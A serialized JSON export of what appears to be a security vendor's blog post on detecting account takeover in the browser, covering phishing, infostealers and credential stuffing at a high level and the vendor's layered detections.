things:",[],{},{"nodeType":250,"data":171136,"content":171137},{},[171138,171148],{"nodeType":254,"data":171139,"content":171140},{},[171141],{"nodeType":178,"data":171142,"content":171143},{},[171144],{"nodeType":173,"value":171145,"marks":171146,"data":171147},"Authentication material e.g. a username and password, with a login portal URL.",[],{},{"nodeType":254,"data":171149,"content":171150},{},[171151],{"nodeType":178,"data":171152,"content":171153},{},[171154],{"nodeType":173,"value":171155,"marks":171156,"data":171157},"Session material e.g. session cookies. ",[],{},{"nodeType":178,"data":171159,"content":171160},{},[171161],{"nodeType":173,"value":171162,"marks":171163,"data":171164},"There are three main ways that an attacker can hijack an account by acquiring (or generating) these materials: Phishing, infostealers, and credential stuffing. ",[],{},{"nodeType":250,"data":171166,"content":171167},{},[171168,171183,171198],{"nodeType":254,"data":171169,"content":171170},{},[171171],{"nodeType":178,"data":171172,"content":171173},{},[171174,171179],{"nodeType":173,"value":171175,"marks":171176,"data":171178},"Phishing:",[171177],{"type":370},{},{"nodeType":173,"value":171180,"marks":171181,"data":171182}," Stealing valid authentication and session material from victims, including usernames, passwords, and session cookies (if AitM or BitM), for a specific site or app.",[],{},{"nodeType":254,"data":171184,"content":171185},{},[171186],{"nodeType":178,"data":171187,"content":171188},{},[171189,171194],{"nodeType":173,"value":171190,"marks":171191,"data":171193},"Infostealers:",[171192],{"type":370},{},{"nodeType":173,"value":171195,"marks":171196,"data":171197}," Stealing valid authentication and session material from the victim’s web browsers for all apps that the user has signed into, as well as desktop information from the device.",[],{},{"nodeType":254,"data":171199,"content":171200},{},[171201],{"nodeType":178,"data":171202,"content":171203},{},[171204,171209],{"nodeType":173,"value":171205,"marks":171206,"data":171208},"Credential stuffing: ",[171207],{"type":370},{},{"nodeType":173,"value":171210,"marks":171211,"data":171212},"Using previously breached authentication or session material in data breach dumps, or taking advantage of weak or guessable passwords (as a result of password reuse).",[],{},{"nodeType":178,"data":171214,"content":171215},{},[171216],{"nodeType":173,"value":171217,"marks":171218,"data":171219},"Once this information has been acquired, the attack path follows a similar journey regardless of the initial attack technique, ending in the attacker initiating a session in their own browser. ",[],{},{"nodeType":312,"data":171221,"content":171225},{"target":171222},{"sys":171223},{"id":171224,"type":317,"linkType":318},"7CJT84yPsiUaUO4Mfb6oFd",[],{"nodeType":178,"data":171227,"content":171228},{},[171229],{"nodeType":173,"value":171230,"marks":171231,"data":171232},"Clearly, there are a number of steps here that involve user behaviors/actions that could in theory be detected with the right visibility:",[],{},{"nodeType":250,"data":171234,"content":171235},{},[171236,171246,171256,171266],{"nodeType":254,"data":171237,"content":171238},{},[171239],{"nodeType":178,"data":171240,"content":171241},{},[171242],{"nodeType":173,"value":171243,"marks":171244,"data":171245},"The victim being sent and accessing a malicious link, or downloading a malicious file",[],{},{"nodeType":254,"data":171247,"content":171248},{},[171249],{"nodeType":178,"data":171250,"content":171251},{},[171252],{"nodeType":173,"value":171253,"marks":171254,"data":171255},"The victim loading a malicious webpage",[],{},{"nodeType":254,"data":171257,"content":171258},{},[171259],{"nodeType":178,"data":171260,"content":171261},{},[171262],{"nodeType":173,"value":171263,"marks":171264,"data":171265},"The victim interacting with a malicious webpage, such as entering their credentials",[],{},{"nodeType":254,"data":171267,"content":171268},{},[171269],{"nodeType":178,"data":171270,"content":171271},{},[171272],{"nodeType":173,"value":171273,"marks":171274,"data":171275},"(If an infostealer attack) The victim executing malware on their device",[],{},{"nodeType":178,"data":171277,"content":171278},{},[171279],{"nodeType":173,"value":171280,"marks":171281,"data":171282},"Finally, the attacker must also access the stolen account from their own device/browser.",[],{},{"nodeType":235,"data":171284,"content":171285},{},[171286],{"nodeType":173,"value":171287,"marks":171288,"data":171290},"Existing controls are falling short",[171289],{"type":370},{},{"nodeType":178,"data":171292,"content":171293},{},[171294],{"nodeType":173,"value":171295,"marks":171296,"data":171297},"So, now we know what these attacks look like, how do you feasibly detect and block them? ",[],{},{"nodeType":178,"data":171299,"content":171300},{},[171301],{"nodeType":173,"value":171302,"marks":171303,"data":171304},"The vast majority of identity attacks take place entirely over the internet. These attacks don’t involve traditional network and endpoint-based techniques, and therefore don’t run into many of your existing perimeter controls. Infostealer attacks are the exception in that they do involve an endpoint compromise (and therefore come up against EDR), but attackers are continually finding new bypass techniques, or are targeting unmanaged devices that are not protected by EDR. ",[],{},{"nodeType":178,"data":171306,"content":171307},{},[171308,171312,171320,171324,171332],{"nodeType":173,"value":171309,"marks":171310,"data":171311},"This leaves us in the hands of TI-driven blocklists and SWG/email controls that identify and block malicious content. However, these controls are largely based on ",[],{},{"nodeType":186,"data":171313,"content":171314},{"uri":188},[171315],{"nodeType":173,"value":171316,"marks":171317,"data":171319},"indicators like domain names, URLs, and IPs",[171318],{"type":194},{},{"nodeType":173,"value":171321,"marks":171322,"data":171323}," which are easy for attackers to change (and therefore bypass). Where pages and downloads are analyzed, ",[],{},{"nodeType":186,"data":171325,"content":171326},{"uri":74693},[171327],{"nodeType":173,"value":171328,"marks":171329,"data":171331},"attackers are routinely implementing obfuscation measures to defeat more advanced dynamic controls",[171330],{"type":194},{},{"nodeType":173,"value":171333,"marks":171334,"data":171335}," with a lot of success, or using techniques like HTML smuggling to bypass download scanning tools. ",[],{},{"nodeType":235,"data":171337,"content":171338},{},[171339],{"nodeType":173,"value":171340,"marks":171341,"data":171343},"Detecting and responding to account takeover with Push",[171342],{"type":370},{},{"nodeType":178,"data":171345,"content":171346},{},[171347],{"nodeType":173,"value":171348,"marks":171349,"data":171350},"But, Push’s vantage point in the browser gives us a very different perspective. Because in the browser, you have much better visibility of the rendered web page (meaning it's much harder to disguise malicious content). You also aren’t restricted to email, and can intercept a user loading a malicious page whatever it’s source. ",[],{},{"nodeType":312,"data":171352,"content":171356},{"target":171353},{"sys":171354},{"id":171355,"type":317,"linkType":318},"4JpFRHGRGEbCb1hNF0CGlE",[],{"nodeType":178,"data":171358,"content":171359},{},[171360],{"nodeType":173,"value":171361,"marks":171362,"data":171363},"So, let’s compare the typical web-based controls that organizations rely on against what’s possible using Push’s browser-based solution. We’ll put EDR to one side here and focus on a typical phishing attack, since the majority of the attack path happens over the internet (and the attacker has to return to the internet to access the app/account anyway). ",[],{},{"nodeType":312,"data":171365,"content":171369},{"target":171366},{"sys":171367},{"id":171368,"type":317,"linkType":318},"4ua9ZNNSnxJnRLwJvRTaf1",[],{"nodeType":178,"data":171371,"content":171372},{},[171373],{"nodeType":173,"value":171374,"marks":171375,"data":171376},"You can see here that attackers have established methods of routinely bypassing these controls. In contrast, with Push, there are layered detections against different stages of the attack path to account takeover, providing defense-in-depth should a layer be somehow bypassed.",[],{},{"nodeType":312,"data":171378,"content":171382},{"target":171379},{"sys":171380},{"id":171381,"type":317,"linkType":318},"ogIj92nzV9Q2Z7I9YOgG3",[],{"nodeType":178,"data":171384,"content":171385},{},[171386],{"nodeType":173,"value":171387,"marks":171388,"data":171389},"In practice, this creates four strong lines of defense – all before an attacker can even take over an account. ",[],{},{"nodeType":250,"data":171391,"content":171392},{},[171393,171412,171431,171450],{"nodeType":254,"data":171394,"content":171395},{},[171396],{"nodeType":178,"data":171397,"content":171398},{},[171399,171403,171409],{"nodeType":173,"value":171400,"marks":171401,"data":171402},"1st line: ",[],{},{"nodeType":186,"data":171404,"content":171405},{"uri":75027},[171406],{"nodeType":173,"value":75030,"marks":171407,"data":171408},[],{},{"nodeType":173,"value":37,"marks":171410,"data":171411},[],{},{"nodeType":254,"data":171413,"content":171414},{},[171415],{"nodeType":178,"data":171416,"content":171417},{},[171418,171422,171428],{"nodeType":173,"value":171419,"marks":171420,"data":171421},"2nd line: ",[],{},{"nodeType":186,"data":171423,"content":171424},{"uri":75048},[171425],{"nodeType":173,"value":75051,"marks":171426,"data":171427},[],{},{"nodeType":173,"value":197,"marks":171429,"data":171430},[],{},{"nodeType":254,"data":171432,"content":171433},{},[171434],{"nodeType":178,"data":171435,"content":171436},{},[171437,171441,171447],{"nodeType":173,"value":171438,"marks":171439,"data":171440},"3rd line: ",[],{},{"nodeType":186,"data":171442,"content":171443},{"uri":9099},[171444],{"nodeType":173,"value":75009,"marks":171445,"data":171446},[],{},{"nodeType":173,"value":197,"marks":171448,"data":171449},[],{},{"nodeType":254,"data":171451,"content":171452},{},[171453],{"nodeType":178,"data":171454,"content":171455},{},[171456,171460,171467],{"nodeType":173,"value":171457,"marks":171458,"data":171459},"4th line: ",[],{},{"nodeType":186,"data":171461,"content":171462},{"uri":4751},[171463],{"nodeType":173,"value":171464,"marks":171465,"data":171466},"Detecting when an attacker resumes a stolen session in a browser without the Push extension running. ",[],{},{"nodeType":173,"value":37,"marks":171468,"data":171469},[],{},{"nodeType":178,"data":171471,"content":171472},{},[171473],{"nodeType":173,"value":171474,"marks":171475,"data":171476},"Each of these controls either detects and blocks the account takeover attempt outright, or provides a high-fidelity indicator that should trigger a priority investigation via your SecOps workflow. ",[],{},{"nodeType":169,"data":171478,"content":171479},{},[171480],{"nodeType":173,"value":40632,"marks":171481,"data":171483},[171482],{"type":370},{},{"nodeType":178,"data":171485,"content":171486},{},[171487],{"nodeType":173,"value":171488,"marks":171489,"data":171490},"Hopefully we’ve demonstrated shifting detection left isn’t just possible, but essential for defending against modern identity attacks and account takeover. ",[],{},{"nodeType":178,"data":171492,"content":171493},{},[171494,171498,171506],{"nodeType":173,"value":171495,"marks":171496,"data":171497},"This is the second post in our design philosophy series, so if you want to read about how we’re building detections that are hard for attackers to bypass using the Pyramid of Pain, ",[],{},{"nodeType":186,"data":171499,"content":171500},{"uri":188},[171501],{"nodeType":173,"value":171502,"marks":171503,"data":171505},"you can check it out here",[171504],{"type":194},{},{"nodeType":173,"value":197,"marks":171507,"data":171508},[],{},{"nodeType":178,"data":171510,"content":171511},{},[171512],{"nodeType":173,"value":171513,"marks":171514,"data":171515},"We look forward to sharing more about our design philosophy with you in the future! ",[],{},"Shifting detection left for more effective threat detection","Why relying on post-compromise detection and response is no longer an option for modern browser-based attacks.","2024-10-25T00:00:00.000Z","shifting-detection-left-for-more-effective-threat-detection",{"items":171521},[171522,171524],{"sys":171523,"name":509},{"id":508},{"sys":171525,"name":505},{"id":504},{"items":171527},[171528],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":171529},{"url":1496},{"__typename":1528,"sys":171531,"content":171532,"title":496,"synopsis":497,"hashTags":118,"publishedDate":498,"slug":499,"tagsCollection":171806,"authorsCollection":171812},{"id":162},{"json":171533},{"nodeType":165,"data":171534,"content":171535},{},[171536,171542,171558,171571,171577,171583,171586,171592,171598,171646,171652,171657,171660,171666,171672,171678,171684,171690,171704,171709,171715,171721,171735,171740,171746,171752,171758,171764,171770,171773,171779,171795,171800],{"nodeType":169,"data":171537,"content":171538},{},[171539],{"nodeType":173,"value":174,"marks":171540,"data":171541},[],{},{"nodeType":178,"data":171543,"content":171544},{},[171545,171548,171555],{"nodeType":173,"value":182,"marks":171546,"data":171547},[],{},{"nodeType":186,"data":171549,"content":171550},{"uri":188},[171551],{"nodeType":173,"value":191,"marks":171552,"data":171554},[171553],{"type":194},{},{"nodeType":173,"value":197,"marks":171556,"data":171557},[],{},{"nodeType":178,"data":171559,"content":171560},{},[171561,171564,171568],{"nodeType":173,"value":204,"marks":171562,"data":171563},[],{},{"nodeType":173,"value":208,"marks":171565,"data":171567},[171566],{"type":194},{},{"nodeType":173,"value":213,"marks":171569,"data":171570},[],{},{"nodeType":178,"data":171572,"content":171573},{},[171574],{"nodeType":173,"value":220,"marks":171575,"data":171576},[],{},{"nodeType":178,"data":171578,"content":171579},{},[171580],{"nodeType":173,"value":227,"marks":171581,"data":171582},[],{},{"nodeType":231,"data":171584,"content":171585},{},[],{"nodeType":235,"data":171587,"content":171588},{},[171589],{"nodeType":173,"value":239,"marks":171590,"data":171591},[],{},{"nodeType":178,"data":171593,"content":171594},{},[171595],{"nodeType":173,"value":246,"marks":171596,"data":171597},[],{},{"nodeType":250,"data":171599,"content":171600},{},[171601,171610,171619,171628,171637],{"nodeType":254,"data":171602,"content":171603},{},[171604],{"nodeType":178,"data":171605,"content":171606},{},[171607],{"nodeType":173,"value":261,"marks":171608,"data":171609},[],{},{"nodeType":254,"data":171611,"content":171612},{},[171613],{"nodeType":178,"data":171614,"content":171615},{},[171616],{"nodeType":173,"value":271,"marks":171617,"data":171618},[],{},{"nodeType":254,"data":171620,"content":171621},{},[171622],{"nodeType":178,"data":171623,"content":171624},{},[171625],{"nodeType":173,"value":281,"marks":171626,"data":171627},[],{},{"nodeType":254,"data":171629,"content":171630},{},[171631],{"nodeType":178,"data":171632,"content":171633},{},[171634],{"nodeType":173,"value":291,"marks":171635,"data":171636},[],{},{"nodeType":254,"data":171638,"content":171639},{},[171640],{"nodeType":178,"data":171641,"content":171642},{},[171643],{"nodeType":173,"value":301,"marks":171644,"data":171645},[],{},{"nodeType":178,"data":171647,"content":171648},{},[171649],{"nodeType":173,"value":308,"marks":171650,"data":171651},[],{},{"nodeType":312,"data":171653,"content":171656},{"target":171654},{"sys":171655},{"id":316,"type":317,"linkType":318},[],{"nodeType":231,"data":171658,"content":171659},{},[],{"nodeType":235,"data":171661,"content":171662},{},[171663],{"nodeType":173,"value":327,"marks":171664,"data":171665},[],{},{"nodeType":178,"data":171667,"content":171668},{},[171669],{"nodeType":173,"value":334,"marks":171670,"data":171671},[],{},{"nodeType":178,"data":171673,"content":171674},{},[171675],{"nodeType":173,"value":341,"marks":171676,"data":171677},[],{},{"nodeType":178,"data":171679,"content":171680},{},[171681],{"nodeType":173,"value":348,"marks":171682,"data":171683},[],{},{"nodeType":178,"data":171685,"content":171686},{},[171687],{"nodeType":173,"value":355,"marks":171688,"data":171689},[],{},{"nodeType":235,"data":171691,"content":171692},{},[171693,171696,171701],{"nodeType":173,"value":362,"marks":171694,"data":171695},[],{},{"nodeType":173,"value":366,"marks":171697,"data":171700},[171698,171699],{"type":194},{"type":370},{},{"nodeType":173,"value":373,"marks":171702,"data":171703},[],{},{"nodeType":312,"data":171705,"content":171708},{"target":171706},{"sys":171707},{"id":380,"type":317,"linkType":318},[],{"nodeType":178,"data":171710,"content":171711},{},[171712],{"nodeType":173,"value":386,"marks":171713,"data":171714},[],{},{"nodeType":178,"data":171716,"content":171717},{},[171718],{"nodeType":173,"value":393,"marks":171719,"data":171720},[],{},{"nodeType":235,"data":171722,"content":171723},{},[171724,171727,171732],{"nodeType":173,"value":400,"marks":171725,"data":171726},[],{},{"nodeType":173,"value":404,"marks":171728,"data":171731},[171729,171730],{"type":194},{"type":370},{},{"nodeType":173,"value":410,"marks":171733,"data":171734},[],{},{"nodeType":312,"data":171736,"content":171739},{"target":171737},{"sys":171738},{"id":417,"type":317,"linkType":318},[],{"nodeType":178,"data":171741,"content":171742},{},[171743],{"nodeType":173,"value":423,"marks":171744,"data":171745},[],{},{"nodeType":178,"data":171747,"content":171748},{},[171749],{"nodeType":173,"value":430,"marks":171750,"data":171751},[],{},{"nodeType":178,"data":171753,"content":171754},{},[171755],{"nodeType":173,"value":437,"marks":171756,"data":171757},[],{},{"nodeType":178,"data":171759,"content":171760},{},[171761],{"nodeType":173,"value":444,"marks":171762,"data":171763},[],{},{"nodeType":178,"data":171765,"content":171766},{},[171767],{"nodeType":173,"value":451,"marks":171768,"data":171769},[],{},{"nodeType":231,"data":171771,"content":171772},{},[],{"nodeType":169,"data":171774,"content":171775},{},[171776],{"nodeType":173,"value":461,"marks":171777,"data":171778},[],{},{"nodeType":178,"data":171780,"content":171781},{},[171782,171785,171792],{"nodeType":173,"value":468,"marks":171783,"data":171784},[],{},{"nodeType":186,"data":171786,"content":171787},{"uri":473},[171788],{"nodeType":173,"value":476,"marks":171789,"data":171791},[171790],{"type":194},{},{"nodeType":173,"value":481,"marks":171793,"data":171794},[],{},{"nodeType":312,"data":171796,"content":171799},{"target":171797},{"sys":171798},{"id":488,"type":317,"linkType":318},[],{"nodeType":178,"data":171801,"content":171802},{},[171803],{"nodeType":173,"value":37,"marks":171804,"data":171805},[],{},{"items":171807},[171808,171810],{"sys":171809,"name":505},{"id":504},{"sys":171811,"name":509},{"id":508},{"items":171813},[171814],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":171815},{"url":516},{"items":171817},[171818],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":171819},{"url":2911},{"json":171821,"links":173125},{"nodeType":165,"data":171822,"content":171823},{},[171824,171830,171836,171849,171854,171869,171875,171881,171884,171890,171896,171966,171972,171978,171984,171990,171996,172002,172015,172020,172094,172100,172106,172137,172143,172148,172154,172167,172262,172282,172287,172293,172306,172311,172314,172320,172326,172339,172345,172351,172357,172377,172394,172399,172405,172411,172417,172430,172435,172466,172471,172477,172504,172514,172520,172526,172532,172576,172582,172587,172593,172596,172602,172608,172614,172620,172668,172681,172727,172754,172760,172815,172820,172826,172874,172891,172897,172910,172945,172951,172957,172963,172985,172990,172993,172999,173005,173011,173108,173114,173119],{"nodeType":169,"data":171825,"content":171826},{},[171827],{"nodeType":173,"value":155997,"marks":171828,"data":171829},[],{},{"nodeType":178,"data":171831,"content":171832},{},[171833],{"nodeType":173,"value":156004,"marks":171834,"data":171835},[],{},{"nodeType":178,"data":171837,"content":171838},{},[171839,171842,171846],{"nodeType":173,"value":156011,"marks":171840,"data":171841},[],{},{"nodeType":173,"value":156015,"marks":171843,"data":171845},[171844],{"type":1646},{},{"nodeType":173,"value":156020,"marks":171847,"data":171848},[],{},{"nodeType":312,"data":171850,"content":171853},{"target":171851},{"sys":171852},{"id":156027,"type":317,"linkType":318},[],{"nodeType":178,"data":171855,"content":171856},{},[171857,171860,171866],{"nodeType":173,"value":156033,"marks":171858,"data":171859},[],{},{"nodeType":186,"data":171861,"content":171862},{"uri":156038},[171863],{"nodeType":173,"value":156041,"marks":171864,"data":171865},[],{},{"nodeType":173,"value":156045,"marks":171867,"data":171868},[],{},{"nodeType":178,"data":171870,"content":171871},{},[171872],{"nodeType":173,"value":156052,"marks":171873,"data":171874},[],{},{"nodeType":178,"data":171876,"content":171877},{},[171878],{"nodeType":173,"value":156059,"marks":171879,"data":171880},[],{},{"nodeType":231,"data":171882,"content":171883},{},[],{"nodeType":169,"data":171885,"content":171886},{},[171887],{"nodeType":173,"value":156069,"marks":171888,"data":171889},[],{},{"nodeType":178,"data":171891,"content":171892},{},[171893],{"nodeType":173,"value":156076,"marks":171894,"data":171895},[],{},{"nodeType":250,"data":171897,"content":171898},{},[171899,171919,171939,171948,171957],{"nodeType":254,"data":171900,"content":171901},{},[171902],{"nodeType":178,"data":171903,"content":171904},{},[171905,171908,171916],{"nodeType":173,"value":156089,"marks":171906,"data":171907},[],{},{"nodeType":1698,"data":171909,"content":171912},{"target":171910},{"sys":171911},{"id":139982,"type":317,"linkType":318},[171913],{"nodeType":173,"value":156098,"marks":171914,"data":171915},[],{},{"nodeType":173,"value":1477,"marks":171917,"data":171918},[],{},{"nodeType":254,"data":171920,"content":171921},{},[171922],{"nodeType":178,"data":171923,"content":171924},{},[171925,171928,171936],{"nodeType":173,"value":156111,"marks":171926,"data":171927},[],{},{"nodeType":1698,"data":171929,"content":171932},{"target":171930},{"sys":171931},{"id":74493,"type":317,"linkType":318},[171933],{"nodeType":173,"value":156120,"marks":171934,"data":171935},[],{},{"nodeType":173,"value":156124,"marks":171937,"data":171938},[],{},{"nodeType":254,"data":171940,"content":171941},{},[171942],{"nodeType":178,"data":171943,"content":171944},{},[171945],{"nodeType":173,"value":156134,"marks":171946,"data":171947},[],{},{"nodeType":254,"data":171949,"content":171950},{},[171951],{"nodeType":178,"data":171952,"content":171953},{},[171954],{"nodeType":173,"value":156144,"marks":171955,"data":171956},[],{},{"nodeType":254,"data":171958,"content":171959},{},[171960],{"nodeType":178,"data":171961,"content":171962},{},[171963],{"nodeType":173,"value":156154,"marks":171964,"data":171965},[],{},{"nodeType":178,"data":171967,"content":171968},{},[171969],{"nodeType":173,"value":156161,"marks":171970,"data":171971},[],{},{"nodeType":178,"data":171973,"content":171974},{},[171975],{"nodeType":173,"value":156168,"marks":171976,"data":171977},[],{},{"nodeType":178,"data":171979,"content":171980},{},[171981],{"nodeType":173,"value":156175,"marks":171982,"data":171983},[],{},{"nodeType":178,"data":171985,"content":171986},{},[171987],{"nodeType":173,"value":156182,"marks":171988,"data":171989},[],{},{"nodeType":178,"data":171991,"content":171992},{},[171993],{"nodeType":173,"value":156189,"marks":171994,"data":171995},[],{},{"nodeType":235,"data":171997,"content":171998},{},[171999],{"nodeType":173,"value":156196,"marks":172000,"data":172001},[],{},{"nodeType":178,"data":172003,"content":172004},{},[172005,172008,172012],{"nodeType":173,"value":156203,"marks":172006,"data":172007},[],{},{"nodeType":173,"value":24345,"marks":172009,"data":172011},[172010],{"type":370},{},{"nodeType":173,"value":1477,"marks":172013,"data":172014},[],{},{"nodeType":312,"data":172016,"content":172019},{"target":172017},{"sys":172018},{"id":156217,"type":317,"linkType":318},[],{"nodeType":250,"data":172021,"content":172022},{},[172023,172060,172069,172078],{"nodeType":254,"data":172024,"content":172025},{},[172026],{"nodeType":178,"data":172027,"content":172028},{},[172029,172032,172036,172039,172043,172046,172050,172053,172057],{"nodeType":173,"value":2785,"marks":172030,"data":172031},[],{},{"nodeType":173,"value":18649,"marks":172033,"data":172035},[172034],{"type":370},{},{"nodeType":173,"value":156236,"marks":172037,"data":172038},[],{},{"nodeType":173,"value":24345,"marks":172040,"data":172042},[172041],{"type":370},{},{"nodeType":173,"value":156244,"marks":172044,"data":172045},[],{},{"nodeType":173,"value":2740,"marks":172047,"data":172049},[172048],{"type":370},{},{"nodeType":173,"value":1464,"marks":172051,"data":172052},[],{},{"nodeType":173,"value":2748,"marks":172054,"data":172056},[172055],{"type":370},{},{"nodeType":173,"value":1477,"marks":172058,"data":172059},[],{},{"nodeType":254,"data":172061,"content":172062},{},[172063],{"nodeType":178,"data":172064,"content":172065},{},[172066],{"nodeType":173,"value":156268,"marks":172067,"data":172068},[],{},{"nodeType":254,"data":172070,"content":172071},{},[172072],{"nodeType":178,"data":172073,"content":172074},{},[172075],{"nodeType":173,"value":156278,"marks":172076,"data":172077},[],{},{"nodeType":254,"data":172079,"content":172080},{},[172081],{"nodeType":178,"data":172082,"content":172083},{},[172084,172087,172091],{"nodeType":173,"value":156288,"marks":172085,"data":172086},[],{},{"nodeType":173,"value":2718,"marks":172088,"data":172090},[172089],{"type":370},{},{"nodeType":173,"value":156296,"marks":172092,"data":172093},[],{},{"nodeType":178,"data":172095,"content":172096},{},[172097],{"nodeType":173,"value":156303,"marks":172098,"data":172099},[],{},{"nodeType":235,"data":172101,"content":172102},{},[172103],{"nodeType":173,"value":156310,"marks":172104,"data":172105},[],{},{"nodeType":178,"data":172107,"content":172108},{},[172109,172112,172120,172123,172127,172130,172134],{"nodeType":173,"value":156317,"marks":172110,"data":172111},[],{},{"nodeType":1698,"data":172113,"content":172116},{"target":172114},{"sys":172115},{"id":24713,"type":317,"linkType":318},[172117],{"nodeType":173,"value":24636,"marks":172118,"data":172119},[],{},{"nodeType":173,"value":156329,"marks":172121,"data":172122},[],{},{"nodeType":173,"value":156333,"marks":172124,"data":172126},[172125],{"type":370},{},{"nodeType":173,"value":156338,"marks":172128,"data":172129},[],{},{"nodeType":173,"value":65430,"marks":172131,"data":172133},[172132],{"type":370},{},{"nodeType":173,"value":2340,"marks":172135,"data":172136},[],{},{"nodeType":178,"data":172138,"content":172139},{},[172140],{"nodeType":173,"value":156352,"marks":172141,"data":172142},[],{},{"nodeType":312,"data":172144,"content":172147},{"target":172145},{"sys":172146},{"id":148649,"type":317,"linkType":318},[],{"nodeType":235,"data":172149,"content":172150},{},[172151],{"nodeType":173,"value":156364,"marks":172152,"data":172153},[],{},{"nodeType":178,"data":172155,"content":172156},{},[172157,172160,172164],{"nodeType":173,"value":156371,"marks":172158,"data":172159},[],{},{"nodeType":173,"value":2701,"marks":172161,"data":172163},[172162],{"type":370},{},{"nodeType":173,"value":156379,"marks":172165,"data":172166},[],{},{"nodeType":250,"data":172168,"content":172169},{},[172170,172202,172222,172242],{"nodeType":254,"data":172171,"content":172172},{},[172173],{"nodeType":178,"data":172174,"content":172175},{},[172176,172180,172183,172192,172195,172199],{"nodeType":173,"value":156392,"marks":172177,"data":172179},[172178],{"type":370},{},{"nodeType":173,"value":156397,"marks":172181,"data":172182},[],{},{"nodeType":1698,"data":172184,"content":172187},{"target":172185},{"sys":172186},{"id":156404,"type":317,"linkType":318},[172188],{"nodeType":173,"value":156407,"marks":172189,"data":172191},[172190],{"type":370},{},{"nodeType":173,"value":156412,"marks":172193,"data":172194},[],{},{"nodeType":173,"value":2789,"marks":172196,"data":172198},[172197],{"type":370},{},{"nodeType":173,"value":156420,"marks":172200,"data":172201},[],{},{"nodeType":254,"data":172203,"content":172204},{},[172205],{"nodeType":178,"data":172206,"content":172207},{},[172208,172212,172215,172219],{"nodeType":173,"value":156430,"marks":172209,"data":172211},[172210],{"type":370},{},{"nodeType":173,"value":156435,"marks":172213,"data":172214},[],{},{"nodeType":173,"value":2701,"marks":172216,"data":172218},[172217],{"type":370},{},{"nodeType":173,"value":156443,"marks":172220,"data":172221},[],{},{"nodeType":254,"data":172223,"content":172224},{},[172225],{"nodeType":178,"data":172226,"content":172227},{},[172228,172232,172235,172239],{"nodeType":173,"value":156453,"marks":172229,"data":172231},[172230],{"type":370},{},{"nodeType":173,"value":156458,"marks":172233,"data":172234},[],{},{"nodeType":173,"value":2701,"marks":172236,"data":172238},[172237],{"type":370},{},{"nodeType":173,"value":156466,"marks":172240,"data":172241},[],{},{"nodeType":254,"data":172243,"content":172244},{},[172245],{"nodeType":178,"data":172246,"content":172247},{},[172248,172252,172255,172259],{"nodeType":173,"value":156476,"marks":172249,"data":172251},[172250],{"type":370},{},{"nodeType":173,"value":156481,"marks":172253,"data":172254},[],{},{"nodeType":173,"value":24345,"marks":172256,"data":172258},[172257],{"type":370},{},{"nodeType":173,"value":156489,"marks":172260,"data":172261},[],{},{"nodeType":178,"data":172263,"content":172264},{},[172265,172268,172272,172275,172279],{"nodeType":173,"value":156496,"marks":172266,"data":172267},[],{},{"nodeType":173,"value":2718,"marks":172269,"data":172271},[172270],{"type":370},{},{"nodeType":173,"value":156504,"marks":172273,"data":172274},[],{},{"nodeType":173,"value":156508,"marks":172276,"data":172278},[172277],{"type":370},{},{"nodeType":173,"value":156513,"marks":172280,"data":172281},[],{},{"nodeType":312,"data":172283,"content":172286},{"target":172284},{"sys":172285},{"id":156520,"type":317,"linkType":318},[],{"nodeType":235,"data":172288,"content":172289},{},[172290],{"nodeType":173,"value":156526,"marks":172291,"data":172292},[],{},{"nodeType":178,"data":172294,"content":172295},{},[172296,172299,172303],{"nodeType":173,"value":156533,"marks":172297,"data":172298},[],{},{"nodeType":173,"value":156537,"marks":172300,"data":172302},[172301],{"type":370},{},{"nodeType":173,"value":156542,"marks":172304,"data":172305},[],{},{"nodeType":312,"data":172307,"content":172310},{"target":172308},{"sys":172309},{"id":156549,"type":317,"linkType":318},[],{"nodeType":231,"data":172312,"content":172313},{},[],{"nodeType":169,"data":172315,"content":172316},{},[172317],{"nodeType":173,"value":156558,"marks":172318,"data":172319},[],{},{"nodeType":178,"data":172321,"content":172322},{},[172323],{"nodeType":173,"value":156565,"marks":172324,"data":172325},[],{},{"nodeType":178,"data":172327,"content":172328},{},[172329,172332,172336],{"nodeType":173,"value":156572,"marks":172330,"data":172331},[],{},{"nodeType":173,"value":65430,"marks":172333,"data":172335},[172334],{"type":370},{},{"nodeType":173,"value":156580,"marks":172337,"data":172338},[],{},{"nodeType":178,"data":172340,"content":172341},{},[172342],{"nodeType":173,"value":156587,"marks":172343,"data":172344},[],{},{"nodeType":178,"data":172346,"content":172347},{},[172348],{"nodeType":173,"value":156594,"marks":172349,"data":172350},[],{},{"nodeType":235,"data":172352,"content":172353},{},[172354],{"nodeType":173,"value":156601,"marks":172355,"data":172356},[],{},{"nodeType":178,"data":172358,"content":172359},{},[172360,172363,172367,172370,172374],{"nodeType":173,"value":156608,"marks":172361,"data":172362},[],{},{"nodeType":173,"value":65430,"marks":172364,"data":172366},[172365],{"type":370},{},{"nodeType":173,"value":156616,"marks":172368,"data":172369},[],{},{"nodeType":173,"value":156333,"marks":172371,"data":172373},[172372],{"type":370},{},{"nodeType":173,"value":156624,"marks":172375,"data":172376},[],{},{"nodeType":178,"data":172378,"content":172379},{},[172380,172384,172387,172391],{"nodeType":173,"value":156631,"marks":172381,"data":172383},[172382],{"type":370},{},{"nodeType":173,"value":156636,"marks":172385,"data":172386},[],{},{"nodeType":173,"value":156640,"marks":172388,"data":172390},[172389],{"type":370},{},{"nodeType":173,"value":156645,"marks":172392,"data":172393},[],{},{"nodeType":312,"data":172395,"content":172398},{"target":172396},{"sys":172397},{"id":156652,"type":317,"linkType":318},[],{"nodeType":178,"data":172400,"content":172401},{},[172402],{"nodeType":173,"value":156658,"marks":172403,"data":172404},[],{},{"nodeType":178,"data":172406,"content":172407},{},[172408],{"nodeType":173,"value":156665,"marks":172409,"data":172410},[],{},{"nodeType":235,"data":172412,"content":172413},{},[172414],{"nodeType":173,"value":156672,"marks":172415,"data":172416},[],{},{"nodeType":178,"data":172418,"content":172419},{},[172420,172423,172427],{"nodeType":173,"value":156679,"marks":172421,"data":172422},[],{},{"nodeType":173,"value":156683,"marks":172424,"data":172426},[172425],{"type":370},{},{"nodeType":173,"value":156688,"marks":172428,"data":172429},[],{},{"nodeType":312,"data":172431,"content":172434},{"target":172432},{"sys":172433},{"id":156695,"type":317,"linkType":318},[],{"nodeType":178,"data":172436,"content":172437},{},[172438,172441,172445,172448,172452,172455,172463],{"nodeType":173,"value":156701,"marks":172439,"data":172440},[],{},{"nodeType":173,"value":71581,"marks":172442,"data":172444},[172443],{"type":370},{},{"no